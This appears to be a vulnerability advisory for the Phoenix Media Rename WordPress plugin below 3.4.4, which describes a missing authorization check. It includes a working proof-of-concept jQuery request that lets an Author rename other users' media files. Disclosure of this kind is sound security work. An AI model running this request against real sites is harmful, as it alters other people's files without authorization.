Phoenix Media Rename < 3.4.4 - Author Arbitrary Media File Renaming

The plugin does not have capability checks in its phoenix_media_rename AJAX action, which could allow users with Author roles to rename any uploaded media files, including ones they do not own.

PoC

As an Author, go to the page to edit one of your own Media (ie /wp-admin/post.php?post=1993&action;=edit, which contains the _mr_wp_nonce nonce) and run the below in the Web Developer console (564 being the ID of the media the edit, which does not belong to the Author) jQuery.post(ajaxurl, { action: ‘phoenix_media_rename’, type: “”, _wpnonce: jQuery(‘#_mr_wp_nonce’).attr(‘value’), new_filename: “missingauthz”, post_id:564 })